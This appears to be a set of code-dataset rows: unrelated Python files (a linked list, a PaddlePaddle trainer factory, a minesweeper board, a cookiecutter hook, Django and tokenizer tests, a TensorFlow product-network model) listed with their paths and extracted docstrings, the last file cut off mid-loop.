arcpy.AddMessage("Created new Buffer {}".format(self.buf))arcpy.AddMessage("New RESIZE_RETURN_BUF {}:{}".format(buf_,size_))arcpy.AddMessage("RESIZE_RETURN_BUF {}:{}/{}".format(buf_,size_,tls_var.bufSize))arcpy.AddMessage("AttributeError RESIZE_RETURN_BUF {}:{}".format(buf_,size_))arcpy.AddMessage("Created new Buffer {}".format(tls_var.buf)) type: () -> None type: (str) -> strhandle null stringif string is unicode, transcode to utf-8 strif input is bytearray, assumt utf-8 and convert to strinput is already a str type: (str) -> inthandle null stringif string is unicode, transcode to utf-8 strif input is bytearray, assumt utf-8 and convert to strinput is already an intAdd the bytes to the response bytearray from calling functionAdd the bytes to the response bytearray from calling function | 2,309 | en | 0.520907 |
class Node:
""" A singly-linked node. """
def __init__(self, data=None):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__ (self):
self.tail = None
self.head = None
def append(self, data):
node = Node(data)
if self.head:
self.head.next = node
self.head = node
else:
self.tail = node
self.head = node
words = SinglyLinkedList()
words.append('egg')
words.append('ham')
words.append('spam')
current = words.tail
while current:
print(current.data)
current = current.next
| Chapter04/faster_append_singly_linked_list.py | 652 | A singly-linked node. | 21 | en | 0.25106 |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
from paddle.fluid.log_helper import get_logger
local_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer, HeterXpuTrainer, PSGPUTrainer
from .device_worker import Hogwild, DownpourSGD, Section, DownpourSGDOPT
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if not opt_info:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info.get("trainer", "MultiTrainer")
device_worker_class = opt_info.get("device_worker", "Hogwild")
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
# for debug tools
if opt_info is not None:
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None and len(
opt_info.get("dump_fields")) != 0:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None and len(
opt_info.get("dump_fields_path")) != 0:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("dump_param") is not None and len(
opt_info.get("dump_param")) != 0:
trainer._set_dump_param(opt_info["dump_param"])
if opt_info.get("worker_places") is not None:
trainer._set_worker_places(opt_info["worker_places"])
if opt_info.get("use_ps_gpu") is not None:
trainer._set_use_ps_gpu(opt_info["use_ps_gpu"])
if opt_info.get("enable_random_dump") is not None:
trainer._set_enable_random_dump(opt_info[
"enable_random_dump"])
if opt_info.get("dump_interval") is not None:
trainer._set_dump_interval(opt_info["dump_interval"])
if opt_info.get("random_with_lineid") is not None:
trainer._set_random_with_lineid(opt_info[
"random_with_lineid"])
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("loss_names") is not None:
trainer._set_loss_names(opt_info["loss_names"])
trainer._set_device_worker(device_worker)
return trainer
class FetchHandlerMonitor(object):
"""
Defination of FetchHandlerMonitor class,
it's for fetch handler.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
local_logger.warning("the value of {} is not a Variable".format(
key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
while True:
self.running_lock.acquire()
if self.running == False:
break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
if var == None:
local_logger.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
if fetch_dict[key] == None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
| python/paddle/fluid/trainer_factory.py | 8,539 | Defination of FetchHandlerMonitor class,
it's for fetch handler.
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
start monitor,
it will start a monitor thread.
Defination of TrainerFactory.
Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. default is MultiTrainer + Hogwild for debug tools TODO(guru4elephant): needs customized condition | 964 | en | 0.814831 |
# https://en.m.wikipedia.org/wiki/Box_Drawing
from random import randrange
class Board:
# you only need to use update_board() outside this class.
def __init__(self, size, mine_numbers):
self.size = size
self.default_content = " ◌ "
self.board_data = self.create_board(self.size)
self.mine_numbers = mine_numbers
def create_board(self, size):
return [[self.default_content for x in range(self.size)] for y in range(self.size)]
def internal_board(self):
internal_board = ""
for x in range(len(self.board_data)):
drawn_line = ""
for y in range(len(self.board_data)):
drawn_line += self.board_data[x][y]
if y != len(self.board_data) - 1:
drawn_line += "│"
internal_board += drawn_line + "\n"
if x < len(self.board_data) - 1:
internal_board += "───┼" * \
(len(self.board_data) - 1) + "───" + "\n"
return internal_board
def draw_board(self):
internal_board = self.internal_board()
drawn_board = ""
# drawing the boarder around the internal board
internal_board = internal_board.split("\n")
drawn_board += "╔═══" + "╤═══" * (self.size - 1) + "╗" + "\n"
for x in range(0, self.size * 2, 2):
drawn_board += "║" + \
internal_board[x] + "║" + f" :{int(x/2 +1)}" + "\n"
if x != (self.size * 2) - 2:
drawn_board += "╟" + internal_board[x + 1] + "╢" + "\n"
drawn_board += "╚═══" + "╧═══" * (self.size - 1) + "╝" + "\n"
for x in range(self.size):
number = x + 1
if number < 10:
drawn_board += f" {number} "
else:
drawn_board += f" {number}"
return drawn_board
def generate_mines(self):
mine_list = []
while len(mine_list) < self.mine_numbers:
x = randrange(self.size)
y = randrange(self.size)
if (x, y) not in mine_list:
mine_list.append((x, y))
return mine_list
def generate_mine_board(self):
mine_list = self.generate_mines()
mine_board = ([[0 for y in range(self.size)] for x in range(self.size)])
for mine in mine_list:
#add a mine to the mine position, and add 1 to all adjecent spots
x = mine[0]
y = mine[1]
mine_board[y][x] = "◉" # negative = mine
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size and mine_board[y_][x_] != "◉":
mine_board[y_][x_] += 1
return mine_board
def find_valid_starting_mine_board(self, x, y):
#making shure the first x,y input fits
mine_board_candidate = []
while True:
mine_board_candidate = self.generate_mine_board()
if mine_board_candidate[y - 1][x - 1] == 0:
print(mine_board_candidate)
break
self.mine_board = mine_board_candidate
def flood_fill(self, x, y):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == "◉":
raise Exception("the flood fill algo hit a mine, but it shouldn't because it will stop when it hits a number.")
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size:
self.flood_fill(x_, y_)
def reveal_board(self):
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] in [" ◌ ", " ▶ "]:
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
elif self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
elif self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
return self.draw_board()
def check_winning(self):
flag = True
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] != "◉":
flag = False
return flag
def update_board(self, position, flag=False):
"""Takes position [x,y] as input
returns a updated board as a string
"""
x = position[0] - 1
y = position[1] - 1
if flag == True:
if self.board_data[y][x] == " ◌ ":
self.board_data[y][x] = " ▶ "
elif self.board_data[y][x] == " ▶ ":
self.board_data[y][x] = " ◌ "
return self.draw_board()
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
return False
elif isinstance(self.mine_board[y][x], int) and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
else:
self.flood_fill(x, y)
return self.draw_board()
| board.py | 4,601 | Takes position [x,y] as input
returns a updated board as a string
https://en.m.wikipedia.org/wiki/Box_Drawing you only need to use update_board() outside this class. drawing the boarder around the internal boardadd a mine to the mine position, and add 1 to all adjecent spots negative = minemaking shure the first x,y input fits | 330 | en | 0.789235 |
"""Post gen hook to ensure that the generated project
has only one package management, either pipenv or pip."""
import logging
import os
import shutil
import sys
_logger = logging.getLogger()
def clean_extra_package_management_files():
"""Removes either requirements files and folder or the Pipfile."""
use_pipenv = "{{cookiecutter.use_pipenv}}"
use_heroku = "{{cookiecutter.use_heroku}}"
to_delete = []
if use_pipenv == "yes":
to_delete = to_delete + ["requirements.txt", "requirements"]
else:
to_delete.append("Pipfile")
if use_heroku == "no":
to_delete = to_delete + ["Procfile", "app.json"]
try:
for file_or_dir in to_delete:
if os.path.isfile(file_or_dir):
os.remove(file_or_dir)
else:
shutil.rmtree(file_or_dir)
shutil.copy(".env.example", ".env")
open("dev.db", 'a').close()
except OSError as e:
_logger.warning("While attempting to remove file(s) an error occurred")
_logger.warning(f"Error: {e}")
sys.exit(1)
if __name__ == "__main__":
clean_extra_package_management_files()
| hooks/post_gen_project.py | 1,160 | Removes either requirements files and folder or the Pipfile.
Post gen hook to ensure that the generated project
has only one package management, either pipenv or pip. | 166 | en | 0.875291 |
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for environment interface with agent / tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange
class spaces(object):
discrete = 0
box = 1
def get_space(space):
if hasattr(space, 'n'):
return space.n, spaces.discrete, None
elif hasattr(space, 'shape'):
return np.prod(space.shape), spaces.box, (space.low, space.high)
def get_spaces(spaces):
if hasattr(spaces, 'spaces'):
return zip(*[get_space(space) for space in spaces.spaces])
else:
return [(ret,) for ret in get_space(spaces)]
class EnvSpec(object):
def __init__(self, env, try_combining_actions=True,
discretize_actions=None):
self.discretize_actions = discretize_actions
# figure out observation space
self.obs_space = env.observation_space
self.obs_dims, self.obs_types, self.obs_info = get_spaces(self.obs_space)
# figure out action space
self.act_space = env.action_space
self.act_dims, self.act_types, self.act_info = get_spaces(self.act_space)
if self.discretize_actions:
self._act_dims = self.act_dims[:]
self._act_types = self.act_types[:]
self.act_dims = []
self.act_types = []
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
self.act_dims.append(dim)
self.act_types.append(spaces.discrete)
elif typ == spaces.box:
for _ in xrange(dim):
self.act_dims.append(self.discretize_actions)
self.act_types.append(spaces.discrete)
else:
self._act_dims = None
self._act_types = None
if (try_combining_actions and
all(typ == spaces.discrete for typ in self.act_types)):
self.combine_actions = True
self.orig_act_dims = self.act_dims[:]
self.orig_act_types = self.act_types[:]
total_act_dim = 1
for dim in self.act_dims:
total_act_dim *= dim
self.act_dims = [total_act_dim]
self.act_types = [spaces.discrete]
else:
self.combine_actions = False
self.obs_dims_and_types = list(zip(self.obs_dims, self.obs_types))
self.act_dims_and_types = list(zip(self.act_dims, self.act_types))
self.total_obs_dim = sum(self.obs_dims)
self.total_sampling_act_dim = sum(self.sampling_dim(dim, typ)
for dim, typ in self.act_dims_and_types)
self.total_sampled_act_dim = sum(self.act_dims)
def sampling_dim(self, dim, typ):
if typ == spaces.discrete:
return dim
elif typ == spaces.box:
return 2 * dim # Gaussian mean and std
else:
assert False
def convert_actions_to_env(self, actions):
if self.combine_actions:
new_actions = []
actions = actions[0]
for dim in self.orig_act_dims:
new_actions.append(np.mod(actions, dim))
actions = (actions / dim).astype('int32')
actions = new_actions
if self.discretize_actions:
new_actions = []
idx = 0
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
new_actions.append(actions[idx])
idx += 1
elif typ == spaces.box:
low, high = self.act_info[i]
cur_action = []
for j in xrange(dim):
cur_action.append(
low[j] + (high[j] - low[j]) * actions[idx] /
float(self.discretize_actions))
idx += 1
new_actions.append(np.hstack(cur_action))
actions = new_actions
return actions
def convert_env_actions_to_actions(self, actions):
if not self.combine_actions:
return actions
new_actions = 0
base = 1
for act, dim in zip(actions, self.orig_act_dims):
new_actions = new_actions + base * act
base *= dim
return [new_actions]
def convert_obs_to_list(self, obs):
if len(self.obs_dims) == 1:
return [obs]
else:
return list(obs)
def convert_action_to_gym(self, action):
if len(action) == 1:
return action[0]
else:
return list(action)
if ((not self.combine_actions or len(self.orig_act_dims) == 1) and
(len(self.act_dims) == 1 or
(self.discretize_actions and len(self._act_dims) == 1))):
return action[0]
else:
return list(action)
def initial_obs(self, batch_size):
batched = batch_size is not None
batch_size = batch_size or 1
obs = []
for dim, typ in self.obs_dims_and_types:
if typ == spaces.discrete:
obs.append(np.zeros(batch_size))
elif typ == spaces.box:
obs.append(np.zeros([batch_size, dim]))
if batched:
return obs
else:
return zip(*obs)[0]
def initial_act(self, batch_size=None):
batched = batch_size is not None
batch_size = batch_size or 1
act = []
for dim, typ in self.act_dims_and_types:
if typ == spaces.discrete:
act.append(-np.ones(batch_size))
elif typ == spaces.box:
act.append(-np.ones([batch_size, dim]))
if batched:
return act
else:
return zip(*act)[0]
def is_discrete(self, typ):
return typ == spaces.discrete
def is_box(self, typ):
return typ == spaces.box
| research/pcl_rl/env_spec.py | 6,009 | Utilities for environment interface with agent / tensorflow.
Copyright 2017 The TensorFlow Authors All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== figure out observation space figure out action space Gaussian mean and std | 797 | en | 0.83008 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-06-10 08:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data_exchange', '0004_auto_20180610_0833'),
]
operations = [
migrations.AlterField(
model_name='ontaskworkflow',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
migrations.AlterField(
model_name='qualtricssurvey',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
]
| mooclet_engine/data_exchange/migrations/0005_auto_20180610_0835.py | 669 | -*- coding: utf-8 -*- Generated by Django 1.11.7 on 2018-06-10 08:35 | 68 | en | 0.491555 |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
from transformers.file_utils import cached_property
from transformers.testing_utils import slow
from transformers.tokenization_fsmt import VOCAB_FILES_NAMES, FSMTTokenizer
from .test_tokenization_common import TokenizerTesterMixin
# using a different tiny model than the one used for default params defined in init to ensure proper testing
FSMT_TINY2 = "stas/tiny-wmt19-en-ru"
class FSMTTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = FSMTTokenizer
def setUp(self):
super().setUp()
# Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt
vocab = [
"l",
"o",
"w",
"e",
"r",
"s",
"t",
"i",
"d",
"n",
"w</w>",
"r</w>",
"t</w>",
"lo",
"low",
"er</w>",
"low</w>",
"lowest</w>",
"newer</w>",
"wider</w>",
"<unk>",
]
vocab_tokens = dict(zip(vocab, range(len(vocab))))
merges = ["l o 123", "lo w 1456", "e r</w> 1789", ""]
self.langs = ["en", "ru"]
config = {
"langs": self.langs,
"src_vocab_size": 10,
"tgt_vocab_size": 20,
}
self.src_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["src_vocab_file"])
self.tgt_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["tgt_vocab_file"])
config_file = os.path.join(self.tmpdirname, "tokenizer_config.json")
self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["merges_file"])
with open(self.src_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.tgt_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.merges_file, "w") as fp:
fp.write("\n".join(merges))
with open(config_file, "w") as fp:
fp.write(json.dumps(config))
@cached_property
def tokenizer_ru_en(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en")
@cached_property
def tokenizer_en_ru(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-en-ru")
def test_online_tokenizer_config(self):
"""this just tests that the online tokenizer files get correctly fetched and
loaded via its tokenizer_config.json and it's not slow so it's run by normal CI
"""
tokenizer = FSMTTokenizer.from_pretrained(FSMT_TINY2)
self.assertListEqual([tokenizer.src_lang, tokenizer.tgt_lang], ["en", "ru"])
self.assertEqual(tokenizer.src_vocab_size, 21)
self.assertEqual(tokenizer.tgt_vocab_size, 21)
def test_full_tokenizer(self):
""" Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt """
tokenizer = FSMTTokenizer(self.langs, self.src_vocab_file, self.tgt_vocab_file, self.merges_file)
text = "lower"
bpe_tokens = ["low", "er</w>"]
tokens = tokenizer.tokenize(text)
self.assertListEqual(tokens, bpe_tokens)
input_tokens = tokens + ["<unk>"]
input_bpe_tokens = [14, 15, 20]
self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), input_bpe_tokens)
@slow
def test_sequence_builders(self):
tokenizer = self.tokenizer_ru_en
text = tokenizer.encode("sequence builders", add_special_tokens=False)
text_2 = tokenizer.encode("multi-sequence build", add_special_tokens=False)
encoded_sentence = tokenizer.build_inputs_with_special_tokens(text)
encoded_pair = tokenizer.build_inputs_with_special_tokens(text, text_2)
assert encoded_sentence == text + [2]
assert encoded_pair == text + [2] + text_2 + [2]
@slow
def test_match_encode_decode(self):
tokenizer_enc = self.tokenizer_en_ru
tokenizer_dec = self.tokenizer_ru_en
targets = [
[
"Here's a little song I wrote. Don't worry, be happy.",
[2470, 39, 11, 2349, 7222, 70, 5979, 7, 8450, 1050, 13160, 5, 26, 6445, 7, 2],
],
["This is it. No more. I'm done!", [132, 21, 37, 7, 1434, 86, 7, 70, 6476, 1305, 427, 2]],
]
# if data needs to be recreated or added, run:
# import torch
# model = torch.hub.load("pytorch/fairseq", "transformer.wmt19.en-ru", checkpoint_file="model4.pt", tokenizer="moses", bpe="fastbpe")
# for src_text, _ in targets: print(f"""[\n"{src_text}",\n {model.encode(src_text).tolist()}\n],""")
for src_text, tgt_input_ids in targets:
encoded_ids = tokenizer_enc.encode(src_text, return_tensors=None)
self.assertListEqual(encoded_ids, tgt_input_ids)
# and decode backward, using the reversed languages model
decoded_text = tokenizer_dec.decode(encoded_ids, skip_special_tokens=True)
self.assertEqual(decoded_text, src_text)
@slow
def test_tokenizer_lower(self):
tokenizer = FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en", do_lower_case=True)
tokens = tokenizer.tokenize("USA is United States of America")
expected = ["us", "a</w>", "is</w>", "un", "i", "ted</w>", "st", "ates</w>", "of</w>", "am", "er", "ica</w>"]
self.assertListEqual(tokens, expected)
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_torch_encode_plus_sent_to_model(self):
pass
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_np_encode_plus_sent_to_model(self):
pass
| tests/test_tokenization_fsmt.py | 6,396 | Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt
this just tests that the online tokenizer files get correctly fetched and
loaded via its tokenizer_config.json and it's not slow so it's run by normal CI
coding=utf-8 Copyright 2018 The Google AI Language Team Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. using a different tiny model than the one used for default params defined in init to ensure proper testing Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt if data needs to be recreated or added, run: import torch model = torch.hub.load("pytorch/fairseq", "transformer.wmt19.en-ru", checkpoint_file="model4.pt", tokenizer="moses", bpe="fastbpe") for src_text, _ in targets: print(f"""[\n"{src_text}",\n {model.encode(src_text).tolist()}\n],""") and decode backward, using the reversed languages model | 1,353 | en | 0.791041 |
from django.db import models
from django.test import SimpleTestCase
from .models import Book, ChildModel1, ChildModel2
class IndexesTests(SimpleTestCase):
def test_suffix(self):
self.assertEqual(models.Index.suffix, 'idx')
def test_repr(self):
index = models.Index(fields=['title'])
multi_col_index = models.Index(fields=['title', 'author'])
self.assertEqual(repr(index), "<Index: fields='title'>")
self.assertEqual(repr(multi_col_index), "<Index: fields='title, author'>")
def test_eq(self):
index = models.Index(fields=['title'])
same_index = models.Index(fields=['title'])
another_index = models.Index(fields=['title', 'author'])
index.model = Book
same_index.model = Book
another_index.model = Book
self.assertEqual(index, same_index)
self.assertNotEqual(index, another_index)
def test_index_fields_type(self):
with self.assertRaisesMessage(ValueError, 'Index.fields must be a list.'):
models.Index(fields='title')
def test_raises_error_without_field(self):
msg = 'At least one field is required to define an index.'
with self.assertRaisesMessage(ValueError, msg):
models.Index()
def test_max_name_length(self):
msg = 'Index names cannot be longer than 30 characters.'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='looooooooooooong_index_name_idx')
def test_name_constraints(self):
msg = 'Index names cannot start with an underscore (_).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='_name_starting_with_underscore')
msg = 'Index names cannot start with a number (0-9).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='5name_starting_with_number')
def test_name_auto_generation(self):
index = models.Index(fields=['author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_0f5565_idx')
# '-' for DESC columns should be accounted for in the index name.
index = models.Index(fields=['-author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_708765_idx')
# fields may be truncated in the name. db_column is used for naming.
long_field_index = models.Index(fields=['pages'])
long_field_index.set_name_with_model(Book)
self.assertEqual(long_field_index.name, 'model_index_page_co_69235a_idx')
# suffix can't be longer than 3 characters.
long_field_index.suffix = 'suff'
msg = 'Index too long for multiple database support. Is self.suffix longer than 3 characters?'
with self.assertRaisesMessage(AssertionError, msg):
long_field_index.set_name_with_model(Book)
def test_deconstruction(self):
index = models.Index(fields=['title'])
index.set_name_with_model(Book)
path, args, kwargs = index.deconstruct()
self.assertEqual(path, 'django.db.models.Index')
self.assertEqual(args, ())
self.assertEqual(kwargs, {'fields': ['title'], 'name': 'model_index_title_196f42_idx'})
def test_clone(self):
index = models.Index(fields=['title'])
new_index = index.clone()
self.assertIsNot(index, new_index)
self.assertEqual(index.fields, new_index.fields)
def test_abstract_children(self):
index_names = [index.name for index in ChildModel1._meta.indexes]
self.assertEqual(index_names, ['model_index_name_440998_idx'])
index_names = [index.name for index in ChildModel2._meta.indexes]
self.assertEqual(index_names, ['model_index_name_b6c374_idx'])
| desktop/core/ext-py/Django-1.11/tests/model_indexes/tests.py | 3,855 | '-' for DESC columns should be accounted for in the index name. fields may be truncated in the name. db_column is used for naming. suffix can't be longer than 3 characters. | 172 | en | 0.918759 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
from time import time
import tensorflow as tf
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import roc_auc_score
class ProductNN(BaseEstimator, TransformerMixin):
def __init__(self, feature_size, field_size, embedding_size=8,
deep_layers=None, deep_init_size=50, dropout_deep=None,
deep_layer_activation=tf.nn.relu, epoch=10, batch_size=256,
learning_rate=0.001, optimizer="adam", batch_norm=0,
batch_norm_decay=0.995, verbose=False, random_seed=2016,
loss_type="logloss", eval_metric=roc_auc_score,
greater_is_better=True, use_inner=True):
assert loss_type in ["logloss", "mse"],\
"loss_type can be either 'logloss' for classification task or 'mse' for regression task"
if deep_layers is None:
deep_layers = [32, 32]
if dropout_deep is None:
dropout_deep = [0.5, 0.5, 0.5]
self.feature_size = feature_size
self.field_size = field_size
self.embedding_size = embedding_size
self.deep_layers = deep_layers
self.deep_init_size = deep_init_size
self.dropout_dep = dropout_deep
self.deep_layers_activation = deep_layer_activation
self.epoch = epoch
self.batch_size = batch_size
self.learning_rate = learning_rate
self.optimizer_type = optimizer
self.batch_norm = batch_norm
self.batch_norm_decay = batch_norm_decay
self.verbose = verbose
self.random_seed = random_seed
self.loss_type = loss_type
self.greater_is_better = greater_is_better
self.train_result, self.valid_result = [], []
self.use_inner = use_inner
self._init_graph()
def _init_graph(self):
self.graph = tf.Graph()
with self.graph.as_default():
tf.set_random_seed(self.random_seed)
# input data,模型输入
self.feat_index = tf.placeholder(tf.int32, shape=[None, None],
name='feat_index')
self.feat_value = tf.placeholder(tf.float32, shape=[None, None],
name='feat_value')
self.label = tf.placeholder(tf.float32, shape=[None, 1], name='label')
self.dropout_keep_deep = tf.placeholder(tf.float32, shape=[None],
name='dropout_deep_deep')
self.train_phase = tf.placeholder(tf.bool, name='train_phase')
# weight initializing,权重初始化
self.weights = self._initialize_weights()
# model
self.embeddings = tf.nn.embedding_lookup(self.weights['feature_embeddings'], self.feat_index)
feat_value = tf.reshape(self.feat_value, shape=[-1, self.field_size, 1])
self.embeddings = tf.multiply(self.embeddings, feat_value)
# linear signal
linear_output = []
for i in range(self.deep_init_size):
linear_output.append(tf.reshape(tf.reduce_sum(
tf.multiply(self.embeddings, self.weights['product-linear'][i]),
axis=[1, 2]), shape=(-1, 1)))
self.lz = tf.concat(linear_output, axis=1)
# quadratic signal
quadratic_output = []
if self.use_inner:
for i in range(self.deep_init_size):
